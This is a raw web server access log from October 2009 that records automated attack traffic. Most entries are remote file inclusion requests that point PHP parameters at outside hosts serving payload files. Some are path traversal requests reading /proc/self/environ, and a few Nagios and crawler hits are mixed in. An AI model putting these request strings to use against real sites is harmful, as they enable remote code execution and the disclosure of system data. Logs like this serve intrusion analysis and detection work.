67.186.196.125 - - [12/Oct/2009:01:24:16 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3"
62.140.23.192 - - [12/Oct/2009:01:24:32 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:24:32 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:24:32 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:24:40 -0400] "GET /logs/access_log.Q109052200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:24:40 -0400] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:24:40 -0400] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:24:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.140.23.192 - - [12/Oct/2009:01:24:56 -0400] "GET /logs/access_log.Q109053100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
62.140.23.192 - - [12/Oct/2009:01:25:07 -0400] "GET /logs/access_log.Q109053100/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET /logs/access_log.Q109070200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET /logs/access_log.Q109051400//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET /logs/access_log.Q109051400%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET /logs/access_log.Q109070200%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:26:42 -0400] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:27:01 -0400] "GET /logs/access_log.Q109061200%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:27:01 -0400] "GET /logs/access_log.Q109070100%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:27:14 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:27:15 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:27:15 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:48 -0400] "GET //citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:48 -0400] "GET /logs//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:48 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:49 -0400] "GET //citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:49 -0400] "GET /logs//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:49 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:52 -0400] "GET //citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:52 -0400] "GET /logs//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:52 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:53 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:53 -0400] "GET //citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:53 -0400] "GET /logs//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:54 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:57 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:58 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:27:58 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:28:25 -0400] "GET /logs/access_log.Q109051400%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:28:25 -0400] "GET /logs/access_log.Q109070200%20%20//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:28:48 -0400] "GET /logs/access_log.Q109051400//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:28:48 -0400] "GET /logs/access_log.Q109070200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:01:28:51 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:29:51 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:29:51 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:29:51 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:29:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.108.122.160 - - [12/Oct/2009:01:30:17 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:30:17 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:30:22 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:30:27 -0400] "GET /logs/access_log.Q109083000%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:30:28 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:30:28 -0400] "GET /logs/access_log.Q109082100%20%20/?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:30:28 -0400] "GET /?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:30:28 -0400] "GET /logs/?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:30:31 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:30:40 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.114.112.155 - - [12/Oct/2009:01:30:47 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
203.114.112.155 - - [12/Oct/2009:01:30:47 -0400] "GET /logs/access_log.Q109062400%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:30:47 -0400] "GET /logs/access_log.Q109091000%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:30:47 -0400] "GET /logs/access_log.Q109051600%20%20//citywriter/head.php?path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
203.114.112.155 - - [12/Oct/2009:01:30:50 -0400] "GET /logs/access_log.Q109061200%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
203.114.112.155 - - [12/Oct/2009:01:30:50 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:31:15 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:32:31 -0400] "GET /?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:32:32 -0400] "GET /logs/access_log.Q109082100/?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
151.1.24.160 - - [12/Oct/2009:01:32:32 -0400] "GET /logs/?custompluginfile[]=../../../../../../../../../../../../../../../../proc/self/environ%00? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
203.114.112.155 - - [12/Oct/2009:01:32:37 -0400] "GET /logs/access_log.Q109061200/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:32:39 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:32:40 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:32:41 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:32:47 -0400] "GET /logs/access_log.Q109070700//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
203.114.112.155 - - [12/Oct/2009:01:32:50 -0400] "GET /logs/access_log.Q109070100/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:33:05 -0400] "GET /logs/error_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:34:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.229.58.122 - - [12/Oct/2009:01:38:26 -0400] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:38:27 -0400] "GET /logs/access_log.Q109092000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:38:27 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:38:31 -0400] "GET /logs/access_log.Q109081000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:38:32 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.30.81.156 - - [12/Oct/2009:01:38:22 -0400] "GET /logs/access_log.Q109053100 HTTP/1.0" 200 1986553 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.193.15.3 - - [12/Oct/2009:01:38:43 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:38:58 -0400] "GET /logs/access_log.Q109070300/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:38:58 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:38:58 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 200 21518 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:39:10 -0400] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:39:15 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:39:26 -0400] "GET /logs/access_log.Q109062300/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:39:28 -0400] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:39:28 -0400] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:39:29 -0400] "GET /logs/access_log.Q109090900%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:39:31 -0400] "GET /logs/access_log.Q109051000/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:39:43 -0400] "GET /logs/access_log.Q109092000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:39:43 -0400] "GET /logs/access_log.Q109081000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:39:49 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:39:49 -0400] "GET /logs/access_log.Q109060600/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:39:50 -0400] "GET /logs/access_log.Q109082800%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:01:39:51 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
82.193.15.3 - - [12/Oct/2009:01:39:51 -0400] "GET /logs/access_log.Q109071200%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
82.193.15.3 - - [12/Oct/2009:01:39:56 -0400] "GET /logs/access_log.Q109071200//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:40:17 -0400] "GET /logs/access_log.Q109090900//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.229.58.122 - - [12/Oct/2009:01:40:19 -0400] "GET /logs/access_log.Q109082800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:40:22 -0400] "GET //index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:40:22 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:40:22 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:40:26 -0400] "GET //index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:40:26 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:40:27 -0400] "GET /logs/access_log.Q109051400%20%20//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:40:55 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:41:04 -0400] "GET /logs/access_log.Q109052300%20%20//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:41:37 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.29.146.110 - - [12/Oct/2009:01:41:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.29.146.110 - - [12/Oct/2009:01:41:41 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.29.146.110 - - [12/Oct/2009:01:41:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:41:55 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:41:57 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.122.160 - - [12/Oct/2009:01:42:05 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://itnews.or.kr/id1.txt?????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:42:34 -0400] "GET /logs/error_log.Q109071200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
199.238.165.123 - - [12/Oct/2009:01:42:44 -0400] "GET /logs/error_log.Q109082100//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.127.253.244 - - [12/Oct/2009:01:42:56 -0400] "GET /logs/access_log.Q109070300%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.29.146.110 - - [12/Oct/2009:01:43:02 -0400] "GET //index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.29.146.110 - - [12/Oct/2009:01:43:02 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.29.146.110 - - [12/Oct/2009:01:43:02 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://hisandhershaircare.com//images/y.gif?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
